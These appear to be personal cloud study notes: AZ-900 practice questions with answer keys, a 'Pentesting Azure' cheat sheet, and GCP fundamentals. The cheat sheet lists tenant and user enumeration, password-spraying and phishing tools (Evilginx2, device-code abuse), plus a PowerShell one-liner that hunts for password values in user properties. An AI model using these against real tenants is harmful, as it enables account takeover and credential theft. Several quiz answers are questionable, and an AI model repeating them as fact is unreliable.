                            By moving multiple subscriptions under that management group, you can create one role-based access control (RBAC) assignment on the management group, which will inherit that access to all the subscriptions.
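A minimal sketch of that inheritance with the az CLI, assuming a hypothetical management group ID demo-mg:

```
# One assignment at management-group scope flows down to every subscription beneath it
az role assignment create \
  --assignee user@contoso.com \
  --role "Contributor" \
  --scope /providers/Microsoft.Management/managementGroups/demo-mg
```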

                            How many management groups can be supported in a single directory?

                            10,000 management groups can be supported in a single directory.

                            How many levels of depth can a management group tree support?

                            A management group tree can support up to six levels of depth, not including the root level or the subscription level.

                            Can each management group and subscription have multiple parents?

                            No, each management group and subscription can support only one parent.

                            Is each management group and subscription within a single hierarchy in each directory?

                            Yes, all subscriptions and management groups are within a single hierarchy in each directory.

If you want to do the following, use this service:

• Provision Linux and Windows virtual machines in seconds with the configurations of your choice: Virtual Machines
• Achieve high availability by autoscaling to create thousands of VMs in minutes: Virtual Machine Scale Sets
• Get deep discounts when you provision unused compute capacity to run your workloads: Azure Spot Virtual Machines
• Deploy and scale containers on managed Kubernetes: Azure Kubernetes Service (AKS)
• Accelerate app development using an event-driven, serverless architecture: Azure Functions
• Develop microservices and orchestrate containers on Windows and Linux: Azure Service Fabric
• Quickly create cloud apps for web and mobile with a fully managed platform: App Service
• Containerize apps and easily run containers with a single command: Azure Container Instances
• Cloud-scale job scheduling and compute management with the ability to scale to tens, hundreds, or thousands of virtual machines: Batch
• Create highly available, scalable cloud applications and APIs that help you focus on apps instead of hardware: Cloud Services
• Deploy your Azure virtual machines on a physical server used only by your organization: Azure Dedicated Host

                            What is the key difference between vertical scaling and horizontal scaling?

• Vertical scaling adds more processing power, while horizontal scaling increases storage capacity. (Incorrect)
• Vertical scaling adjusts the capabilities of a resource (such as adding CPU or RAM), while horizontal scaling adjusts the number of resources (adding or removing instances). (Correct)

                            You are an IT manager and want to ensure that you are notified when the Azure spending reaches a certain threshold. Which feature of Azure Cost Management should you use?

                            • Budgets (Correct)
                            • Cost alerts (Incorrect)

                            Which of the following tools is NOT available within the Azure Security Center for vulnerability management?

                            • Azure Defender (Incorrect)
                            • Azure Policy (Incorrect)
                            • Azure Advisor (Incorrect)
                            • Azure Firewall Manager (Correct)

Your company makes use of several SQL databases. However, you want to increase their efficiency because of varying and unpredictable workloads. Which of the following can help you with this?

                            • Resource Tags (Incorrect)
                            • Elastic Pools (Correct)
                            • Region Pairs (Incorrect)
                            • Scale Sets (Incorrect)

Just like Azure VM Scale Sets are used with VMs, you can use Elastic Pools with Azure SQL Databases!

SQL Database elastic pools are a simple, cost-effective solution for managing and scaling multiple databases that have varying and unpredictable usage demands. The databases in an elastic pool are on a single Azure SQL Database server and share a set number of resources at a set price. Elastic pools in Azure SQL Database enable SaaS developers to optimize the price performance for a group of databases within a prescribed budget while delivering performance elasticity for each database.
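A minimal az CLI sketch of creating a pool and placing a database in it, assuming a hypothetical existing server demo-sqlserver in resource group demo-rg:

```
# Create an elastic pool, then add a database that shares its resources
az sql elastic-pool create \
  --resource-group demo-rg \
  --server demo-sqlserver \
  --name demo-pool \
  --edition Standard \
  --capacity 100

az sql db create \
  --resource-group demo-rg \
  --server demo-sqlserver \
  --name demo-db \
  --elastic-pool demo-pool
```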

                            Which of the following alert types are available in the Cost Management service? (Select all that apply)

                            • Resource usage alerts (Incorrect)
                            • Budget alerts (Correct)
                            • Department spending quota alerts (Correct)
                            • Credit alerts (Correct)

                            Azure Site Recovery can only be used to replicate and recover virtual machines within Azure.

                            YES / NO

                            The answer is No. Azure Site Recovery can be used to replicate and recover virtual machines not only within Azure, but also from on-premises datacenters to Azure, and between different datacenters or regions. Azure Site Recovery is a disaster recovery solution that provides continuous replication of virtual machines and physical servers to a secondary site, allowing for rapid recovery in case of a disaster. It supports a wide range of scenarios, including replication from VMware, Hyper-V, and physical servers to Azure, as well as replication between Azure regions or datacenters.

                            The ability to provision and deprovision cloud resources quickly, with minimal management effort, is known as _.

                            • Sustainability (Incorrect)
                            • Scalability (Correct)
                            • Elasticity (Incorrect)
                            • Resiliency (Incorrect)

                            The correct answer is Scalability. It specifically refers to the ability to provision and deprovision cloud resources quickly and with minimal management effort.

• Resiliency: It refers to the ability of a system to recover quickly from failures or disruptions. While resiliency is an important attribute of cloud systems, it is not specifically related to the ability to provision and deprovision resources quickly.
• Elasticity: It is the ability of a system to scale up or down in response to changes in demand. This is a closely related concept to scalability, but specifically refers to the ability to handle changes in workload or traffic.
• Sustainability: It refers to the ability of a system to operate in an environmentally friendly manner, with minimal impact on the planet. While sustainability is an important consideration for cloud providers, it is not specifically related to the ability to provision and deprovision resources quickly.

It's possible to deploy an Azure VM from a MacOS-based system by using which of the following options?

• Azure PowerShell (Correct)
• Azure Cloud Shell (Correct)
                            • Azure Portal (Correct)
                            • Azure CLI (Correct)

                            Which of the following can be included as artifacts in an Azure Blueprint? (Select all that apply)

                            • Policy assignments (Correct)
                            • Azure Resource Manager templates (Correct)
                            • Role assignments (Correct)
                            • Resource groups (Correct)

                            Azure Service Health allows us to define the critical resources that should never be impacted due to outages and downtimes.

                            YES / NO

                            No. Azure Service Health notifies you about Azure service incidents and planned maintenance. Although you can see when a maintenance is planned and act accordingly to migrate a VM if needed, you can't prevent service failures.

It's possible to deploy a new Azure VM from a Google Chromebook by using Power Automate.

                            YES / NO

No. Tricky question! Power Automate is not the same as PowerShell.

Which of the following services can help you assign time-bound access to resources using start and end dates, and enforce multi-factor authentication to activate any role?

• Azure Privileged Identity Management (Correct)
• Azure DDoS Protection (Incorrect)
• Azure Security Center (Incorrect)
• Azure Advanced Threat Protection (ATP) (Incorrect)

Azure Active Directory (Azure AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in your organization. These resources include resources in Azure AD, Azure, and other Microsoft Online Services like Office 365 or Microsoft Intune.

                            Which of the following actions can help you reduce your Azure costs?

                            • Enabling automatic scaling for all virtual machines (Incorrect)
                            • Increasing the number of virtual machines deployed (Incorrect)
                            • Reducing the amount of data transferred between Azure regions (Correct)
                            • Keeping all virtual machines running 24/7 (Incorrect)

                            Reducing the amount of data transferred between Azure regions can help reduce costs by minimizing data egress charges.

In the defense-in-depth model, what is the role of the "network" layer?

                            • It secures access to virtual machines. (Incorrect)
                            • It ensures the physical security of computing hardware. (Incorrect)
                            • It limits communication between resources and enforces access controls. (Correct)
                            • It focuses on securing access to applications. (Incorrect)

The "network" layer in the defense-in-depth model is responsible for limiting communication between resources, which helps prevent the spread of attacks. It enforces access controls to ensure that only necessary communication occurs and reduces the risk of an attack affecting other systems.
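One common way this layer is enforced in Azure is with network security groups; a minimal az CLI sketch (all names hypothetical) that allows only inbound HTTPS:

```
# Create an NSG; its built-in DenyAllInbound default rule blocks everything else
az network nsg create --resource-group demo-rg --name demo-nsg

# Explicitly allow only HTTPS inbound
az network nsg rule create \
  --resource-group demo-rg \
  --nsg-name demo-nsg \
  --name AllowHttpsIn \
  --priority 100 \
  --direction Inbound \
  --access Allow \
  --protocol Tcp \
  --destination-port-ranges 443
```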

                            You want to restrict access to certain Azure resources based on departmental requirements within your organization. Which Azure feature would you use?

                            • Resource groups (Incorrect)
                            • Subscriptions (Correct)
                            • Azure Active Directory (Incorrect)
                            • Management groups (Incorrect)

In this scenario, you would use subscriptions to restrict access to certain Azure resources based on departmental requirements. Subscriptions can be used to apply different access-management policies, reflecting different organizational structures. Azure applies access-management policies at the subscription level, which allows you to manage and control access to the resources that users provision within specific subscriptions.

                            Which of the following affect costs in Azure? (Choose 2)

                            • Availability Zone (Incorrect)
                            • Instance size (Correct)
                            • Location (Correct)
                            • Knowledge center usage (Incorrect)

The instance size and the location (e.g., US or Europe) affect the prices. The Knowledge Center is completely free to use, and you aren't charged for an Availability Zone.

                            Which of the following can be used to manage your Azure Resources from an iPhone?

                            • Azure Portal (Correct)
                            • Windows PowerShell (Incorrect)
                            • Azure Cloud Shell (Correct)
                            • Azure CLI (Incorrect)
                            • Azure Mobile App (Correct)

Azure CLI can be installed on macOS but it cannot be installed on an iPhone. PowerShell can be installed on macOS but it cannot be installed on an iPhone.

                            It is possible to deploy Azure resources through a Tablet by using Bash in the Azure Cloud Shell.

YES / NO

Yes. Azure Cloud Shell is an interactive, authenticated, browser-accessible shell for managing Azure resources (the key to everything, since all you need is a browser and the OS doesn't matter). It provides the flexibility of choosing the shell experience that best suits the way you work, either Bash or PowerShell.
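For instance, a Bash session in Cloud Shell can deploy a VM with a couple of az commands; the names and region below are hypothetical:

```
# From the Bash experience in Cloud Shell: create a resource group, then a VM
az group create --name demo-rg --location westeurope

az vm create \
  --resource-group demo-rg \
  --name demo-vm \
  --image Ubuntu2204 \
  --admin-username azureuser \
  --generate-ssh-keys
```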

                            Which of the following services allows you to send events generated from Azure resources to applications?

                            • Azure Event Hub (Incorrect)
                            • Azure Event Grid (Correct)
                            • Azure Cognitive Services (Incorrect)
                            • Azure App Service (Incorrect)

                            What Azure service provides recommendations to optimize your cloud spending based on your usage patterns?

                            • Azure Monitor (Incorrect)
                            • Azure Cost Management and Billing (Correct)
                            • Azure Policy (Incorrect)
                            • Azure Advisor (Incorrect)

Azure Cost Management and Billing is the correct answer and provides recommendations to optimize your cloud spending based on your usage patterns. The service provides insights and cost management tools to help you monitor, allocate, and optimize your cloud costs.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/pentesting-azure/","title":"Pentesting Azure","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#reconnaissance","title":"Reconnaissance","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#network-discovery","title":"Network discovery","text":"
                            • Nmap
                            • Masscan
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#dns-reconnaissance","title":"DNS reconnaissance","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#dns-reconnaissance_1","title":"DNS reconnaissance","text":"
                            • GitHub - aboul3la/Sublist3r: Fast subdomains enumeration tool for penetration testers
                            • GitHub - rbsec/dnscan
                            • nslookup, host, dig
                            • GitHub - darkoperator/dnsrecon: DNS Enumeration Script
                            • GitHub - lanmaster53/recon-ng: Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#certificate-transparency","title":"Certificate transparency","text":"
                            • crt.sh | Certificate Search
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#miscellaneous","title":"Miscellaneous","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#shodan","title":"Shodan","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#eyewitness","title":"Eyewitness","text":"

                            GitHub - FortyNorthSecurity/EyeWitness: EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.

                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#azure-discovery","title":"Azure Discovery","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#finding-tenantid","title":"Finding tenantID","text":"
                            • https://enterpriseregistration.windows.net/company.com/enrollmentserver/contract?api-version=1.4
                            • https://login.microsoftonline.com/getuserrealm.srf?login=username@company.com&xml=1

                            • AADInternals

                            • Invoke-AADIntReconAsOutsider -DomainName company.com
                            • Get-AADIntTenantDomains -Domain company.com
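A lightweight alternative for confirming the tenant from outside, using only curl and jq against the documented login endpoints (company.com is a placeholder):

```
# The tenant GUID shows up inside the endpoints of the OpenID configuration document
curl -s "https://login.microsoftonline.com/company.com/v2.0/.well-known/openid-configuration" | jq -r '.token_endpoint'
# e.g. https://login.microsoftonline.com/<tenant-guid>/oauth2/v2.0/token
```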
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#azure-ip-ranges","title":"Azure IP ranges","text":"

Download Azure IP Ranges and Service Tags – Public Cloud from the Official Microsoft Download Center

                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#openid-configuration-document","title":"OpenID configuration document","text":"
• https://login.microsoftonline.com/<tenant>/v2.0/.well-known/openid-configuration

Scrape Azure Resources

                              GitHub - lutzenfried/CloudScraper: CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.

                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#google-dorks","title":"Google Dorks","text":"
                              • Reveal the Cloud with Google Dorks | by Mike Takahashi | Feb, 2023 | InfoSec Write-ups (infosecwriteups.com)
                              • Useful Google Dorks for Open Source Intelligence Investigations - Maltego
                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#public-repositories-and-leaked-credentials","title":"Public repositories and leaked credentials","text":"
                              • gitleaks (https://github.com/zricethezav/gitleaks)
                              • trufflehog (https://github.com/trufflesecurity/truffleHog)
                              • git-secrets (https://github.com/awslabs/git-secrets)
                              • shhgit (https://github.com/eth0izzle/shhgit)
                              • gitrob (https://github.com/michenriksen/gitrob)
• DumpsterDiver: GitHub - securing/DumpsterDiver: Tool to search secrets in various filetypes.
                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#enumeration","title":"Enumeration","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#public-storage-accounts-enumeration","title":"Public Storage Accounts Enumeration","text":"
                              • Public Buckets (osint.sh)
                              • Public Buckets by GrayhatWarfare
                              • GitHub - initstring/cloud_enum: Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
• MicroBurst: Invoke-EnumerateAzureBlobs
• https://storagename.blob.core.windows.net/CONTAINERNAME?restype=container&comp=list (https://docs.microsoft.com/en-us/rest/api/storageservices/list-containers2)
                              • GitHub - cyberark/BlobHunter: Find exposed data in Azure with this public blob scanner
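If a container allows anonymous access, the List Blobs REST call referenced above can be exercised directly with curl (the storage account and container names are placeholders):

```
# Returns an XML listing of blobs when public access is enabled on the container
curl -s "https://storagename.blob.core.windows.net/CONTAINERNAME?restype=container&comp=list"
```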
                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#onedrive-enumeration","title":"OneDrive Enumeration","text":"
                              • GitHub - nyxgeek/onedrive_user_enum: onedrive user enumeration - pentest tool to enumerate valid o365 users
                              • https://www.trustedsec.com/blog/achieving-passive-user-enumeration-with-onedrive/
                              ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#service-enumeration","title":"Service Enumeration","text":"
• PS C:\> Invoke-EnumerateAzureSubDomains -Base <base name> -Verbose
                              • GitHub - 0xsha/CloudBrute: Awesome cloud enumerator
                              • ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#subdomain-takeover","title":"Subdomain Takeover","text":"
                                • Subdomain Takeover in Azure: making a PoC | GoDiego
                                ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#user-enumeration","title":"User enumeration","text":"
                                • GitHub - LMGsec/o365creeper: Python script that performs email address validation against Office 365 without submitting login attempts.
• https://login.microsoftonline.com/getuserrealm.srf?login=<username>&xml=1
• GitHub - dirkjanm/ROADtools: A collection of Azure AD tools for offensive and defensive security purposes (authenticated)
                                • GitHub - nyxgeek/o365recon: retrieve information via O365 and AzureAD with a valid cred
                                • GitHub - DanielChronlund/DCToolbox: Tools for Microsoft cloud fans
                                • ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#shadow-admin-privileged-users-enumeration","title":"Shadow Admin / Privileged Users Enumeration","text":"
                                  • GitHub - cyberark/SkyArk: SkyArk helps to discover, assess and secure the most privileged entities in Azure and AWS
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#secrets-in-azure","title":"Secrets in Azure","text":"

Not sure if this still works: GitHub - FSecureLABS/Azurite: Enumeration and reconnaissance activities in the Microsoft Azure Cloud.

                                  Find credentials in

                                  • Environment variables or source code (Azure Function)
                                  • .publishsettings
                                  • Web & app config
```
$users = Get-MsolUser -All; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}}
```
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#initial-access-attack","title":"Initial Access Attack","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#password-spraying","title":"Password spraying","text":"
                                  • GitHub - SecurityRiskAdvisors/msspray: Password attacks and MFA validation against various endpoints in Azure and Office 365
                                  • GitHub - dafthack/MSOLSpray: A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.
                                  • GitHub - MarkoH17/Spray365: Spray365 makes spraying Microsoft accounts (Office 365 / Azure AD) easy through its customizable two-step password spraying approach. The built-in execution plan features options that attempt to bypass Azure Smart Lockout and insecure conditional access policies.
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#bypass-conditional-access","title":"Bypass conditional access","text":"
• The Attackers Guide to Azure AD Conditional Access – Daniel Chronlund Cloud Security Blog
                                  • How to Find MFA Bypasses in Conditional Access Policies - YouTube
• Getting started with ROADrecon · dirkjanm/ROADtools Wiki · GitHub
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#instance-metadata-service","title":"Instance Metadata Service","text":"
• Steal Secrets with Azure Instance Metadata Service? Don't Oversight Role-based Access Control | by Marcus Tee | Marcus Tee Anytime | Medium
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#phishing","title":"Phishing","text":"
                                  • Illicit Consent Grant Attack
• Abusing Device Code Flow: - OAuth's Device Code Flow Abused in Phishing Attacks | Secureworks
                                  • Evilginx2: - GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
                                  ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#lateral-movement","title":"Lateral movement","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#privilege-escalation","title":"Privilege escalation","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/pentesting-azure/#persistence","title":"Persistence","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/containers/pentesting-docker/","title":"Pentesting docker","text":"

                                  https://www.panoptica.app/research/7-ways-to-escape-a-container

                                  ","tags":["cloud","docker","containers"]},{"location":"cloud/gcp/gcp-essentials/","title":"Google Cloud Platform (GCP) Essentials","text":"Sources of this notes
                                  • Udemy course: Google Cloud Platform (GCP) Fundamentals for Beginners

                                  Cheatsheets: gcloud CLI

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#basic-numbers","title":"Basic numbers","text":"
                                  • 20 regions
                                  • 61 zones
                                  • 134 network edge locations
                                  • 200+ countries and territories.

A region typically has three or more zones. A zone is the equivalent of a data center in Google Cloud.

                                  Overview of services:

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#signing-up-with-gcp","title":"Signing-up with GCP","text":"

New accounts are provided with $300 in free credits, valid for 90 days, to run more than 25 services for free.

                                  Link: https://cloud.google.com/gcp/

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#gcp-resources","title":"GCP resources","text":"

                                  In Google Cloud Platform, everything that you create is a resource. There is a hierarchy:

                                  • Everything that you create is a resource.
                                  • Resources belong to a project.
                                  • A project directly represents a billable unit. It has a credit card associated.
                                  • Projects may be organized into folders (like dev or production), which provide logical grouping of projects.
                                  • Folders belong to one and only one organization.
                                  • The organization is the top level entity in GCP hierarchy.

                                  If you use Google Suite, you will see the organization level and folders. If you don't, you will only have access to projects and resources.

To interact with GCP there are these tools: the web console, Cloud Shell, the Cloud SDK, the mobile app, and the REST API.

GCP Cloud Shell is an interactive shell environment for GCP, accessible from any web browser and preloaded with gcloud, the command-line utility. It runs on a GCE virtual machine (provisioned with 5 GB of persistent disk storage and a Debian environment) and has built-in preview functionality without dealing with tunneling and other issues.
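A typical first interaction with gcloud from Cloud Shell looks like this (my-project-id is a placeholder):

```
# List projects visible to your account, select one, and verify the configuration
gcloud projects list
gcloud config set project my-project-id
gcloud config list
```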

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#2-compute-services","title":"2. Compute Services","text":"

                                  Code is deployed and executed in one of the compute services:

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#21-app-engine","title":"2.1. App Engine","text":"

It's one of Google's first compute services (PaaS), launched in 2008. It's a fully managed platform for deploying web apps at scale. It supports multiple languages. It's available in two environments:

                                  • Standard: Applications run in a sandbox.
                                  • Flexible: You have more control on packages and environments. Applications run on docker containers, which are in use to deploy but also to scale apps.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#22-compute-engine-gce","title":"2.2. Compute Engine (GCE)","text":"

Google Compute Engine (GCE) enables Linux and Windows VMs to run on Google's global infrastructure. VMs are based on machine types with varied CPU and RAM configurations.

If you need VMs to be persistent, you need to attach additional storage such as standard or SSD disks. Otherwise, when closing the VM you will lose all configurations and setups.

VMs are charged a minimum of 1 minute and in 1-second increments after that. Sustained use discounts are offered for running VMs for a significant portion of the billing month. Committed use discounts are offered for purchases based on 1-year or 3-year contracts.
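A minimal gcloud sketch of launching a VM with a chosen machine type and zone; the names, zone, and image family are placeholders:

```
# Create a VM from a machine type in a specific zone
gcloud compute instances create demo-vm \
  --machine-type=e2-medium \
  --zone=us-central1-a \
  --image-family=debian-12 \
  --image-project=debian-cloud
```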

                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#23-kubernetes-engine","title":"2.3. Kubernetes Engine","text":"
• GKE is a managed environment for deploying containerized applications managed by Kubernetes. Kubernetes originated at Google but is now an open-source project under the Cloud Native Computing Foundation.
• Kubernetes has a control plane and worker node (or multiple).
• GKE provisions worker nodes as GCE VMs. Google manages the control plane (and the master nodes), which is why GKE is called a managed environment.
• Node pools enable mixing and matching different VM configurations.
• The service is tightly integrated with GCP resources such as networking, storage, and monitoring.
• GKE infrastructure is monitored by Stackdriver, GCP's built-in monitoring and tracing platform.
• Auto scaling, automatic upgrades, and node auto-repair are some of the unique features of GKE.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#24-cloud-functions","title":"2.4. Cloud Functions","text":"
• Cloud Functions is a serverless execution environment for building and connecting cloud services.
                                  • Serverless compute environments execute code in response to an event.
                                  • Cloud Functions supports JavaScript, Python, and Go.
                                  • GCP events fire a Cloud Function through a trigger.
                                  • An example event includes adding an object to a storage bucket.
                                  • Trigger connects the event to the function.
                                  • This is FaaS, Function as a Service.
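A sketch of wiring such a trigger with gcloud, assuming a hypothetical bucket demo-bucket and a Python function whose entry point is named handler:

```
# Deploy a function that fires whenever an object lands in the bucket
gcloud functions deploy on-new-object \
  --runtime=python311 \
  --trigger-bucket=demo-bucket \
  --entry-point=handler \
  --region=us-central1
```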
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#3-storage-services","title":"3. Storage Services","text":"
                                  • Storage services add persistence and durability to applications
                                  • Storage services are classified into three types:

                                    • Object storage
                                    • Block storage
                                    • File system
                                  • GCP storage services can be used to store:

                                  • Unstructured data
                                  • Folders and Files
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#31-google-cloud-storage","title":"3.1. Google Cloud Storage","text":"
                                  • Unified object storage for a variety of applications.
                                  • Applications can store and retrieve objects (typically through single API).
                                  • GCS can scale to exabytes of data.
                                  • GCS is designed for 99.999999999% durability.
                                  • GCS can be used to store high-frequency and low-frequency access of data.
                                  • Data can be stored within a single region, dual-region, or multi-region.
• There are three default storage classes for the data: Standard, Nearline, and Coldline.
• Launching GCS: when creating a storage entity in GCP, you create buckets, which are containers for folders and storage objects. Folders may contain files, so buckets are the highest-level container in the GCS hierarchy. For encryption, you can decide between a Google-managed key and a customer-managed key. A retention policy and labels can also be added when creating a storage entity. After that, you can create folders and allocate files in them.
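A minimal gsutil sketch of that bucket/object hierarchy (the bucket name is a placeholder and must be globally unique):

```
# Create a regional bucket with the Standard storage class, upload and list an object
gsutil mb -l us-central1 -c standard gs://demo-unique-bucket-name
gsutil cp notes.txt gs://demo-unique-bucket-name/
gsutil ls gs://demo-unique-bucket-name
```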
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#32-persistent-disks","title":"3.2. Persistent Disks","text":"
                                  • PD provides reliable block storage for GCE VMs.
                                  • Disks are independent of Compute Engine VMs, which means they can have a different lifecycle.
                                  • Each disk can be up to 64TB in size.
• PDs can have one writer and multiple readers, which is quite unique in GCP. You can designate one VM for read-write access while multiple other VMs read from the same disk in read-only mode. This opens up a lot of opportunities for distributed applications with centralized data access (see the sketch after this list).
                                  • Supports both SSD and HDD storage options.
                                  • SSD offers best throughput for I/O intensive applications.
                                  • PD is available in three storage types:
                                    • Zonal.
                                    • Regional.
                                    • Local.
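The sketch below shows the read-only multi-attach flow with gcloud; the VM and disk names are placeholders, and note that a disk attached read-only to several VMs cannot simultaneously be attached read-write elsewhere:

```
# Create a disk, then attach it read-only to more than one VM
gcloud compute disks create shared-data --size=200GB --zone=us-central1-a

gcloud compute instances attach-disk reader-vm-1 \
  --disk=shared-data --zone=us-central1-a --mode=ro
gcloud compute instances attach-disk reader-vm-2 \
  --disk=shared-data --zone=us-central1-a --mode=ro
```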
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#33-google-cloud-filestore","title":"3.3. Google Cloud Filestore","text":"
                                  • Managed file storage service traditionally for legacy applications.
                                  • Delivers NAS-like filesystem interface and a shared filesystem.
                                  • Centralized, highly-available filesystem for GCE and GKE.
                                  • Exposed as a NFS fileshare with fixed export settings and default Unix permissions.
                                  • Filestore file shares are available as mount points in GCE VMs.
                                  • On-prem applications using NAS take advantage of Filestore.
                                  • Filestore has built-in zonal storage redundancy for data availability.
                                  • Data is always encrypted while in transit.
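A minimal sketch of provisioning a share and mounting it from a GCE VM; the instance name, zone, and the NFS server IP are placeholders:

```
# Create a basic Filestore instance exposing an NFS share named share1
gcloud filestore instances create demo-nfs \
  --zone=us-central1-a \
  --tier=BASIC_HDD \
  --file-share=name=share1,capacity=1TB \
  --network=name=default

# On a VM in the same VPC, mount the share (replace 10.0.0.2 with the instance IP)
sudo mount 10.0.0.2:/share1 /mnt/filestore
```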
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#4-network-services","title":"4. Network Services","text":"
                                  • Network services are one of the key building blocks of cloud.
                                  • GCP leverages Google\u2019s global network for connectivity.
• Customers can choose between standard and premium network tiers. Standard tier uses a selection of ISP-based internet backbones for connectivity (which is cheaper), while Premium tier gives access to Google's premium backbone. GCP uses the premium tier as the default option.
                                  • Load balancers route the traffic evenly to multiple endpoints.
                                  • Virtual Private Cloud (VPC) offers private and hybrid networking.
                                  • Customers can extend their data center to GCP through hybrid connectivity.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#41-load-balancers","title":"4.1. Load Balancers","text":"
                                  • Load balancer distributes traffic across multiple GCE VMs in a single or multiple regions.
                                  • There are two types of GCP load balancers:
                                    • HTTP(S) load balancer, which provides global load balancing.
• Network load balancer, which balances regional TCP and UDP traffic within the same region.
• Both types can be configured as internal or external load balancers.
                                  ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#configure-is-a-couple-of-vms-deployed-in-a-region-connected-to-a-load-balancer","title":"Configure is a couple of VMs deployed in a region connected to a load balancer","text":"
                                  • From GCP web dashboard, go to Compute Engine, then Instance Templates.
• Select machine type, disk image, and allow HTTP and HTTPS in the firewall configuration since we are launching a web server. Configure automation to get the server running at boot by adding the following script:
```
# Add the below script while creating the instance template

#! /bin/bash
apt-get update
apt-get install -y apache2
cat <<EOF > /var/www/html/index.html
<html><body><h1>Hello from $(hostname)</h1>
</body></html>
EOF
```
                                  • Create the template.
                                  • Now go to Instance group for setting up the deployment. Configure multiple zones, select the instance template (the one you created before) and the number of instances to deploy. Create a Health Check. Launch the instance group and in a few minutes you will have the 2 web servers (Go to VM instances to see them).
                                  • Go to Network section, then Load balancing and click on create load balancer, and follow the creation tunnel.
                                  • The first step is creating a backend configuration. So the backend configuration will ensure that we have a set of resources responsible for serving the traffic. Options to configure there:

                                    • Network endpoint groups // Or // Instance groups : choose the backend type as the instance group and choose the web server instance group we have launched in the previous step. Port is 80. That is the default port on which Apache is listening.
• Balancing mode: traffic can be routed based on CPU utilization or requests per second. If you are not going to send a lot of traffic, choose rate.
                                    • The maximum RPS, 100.
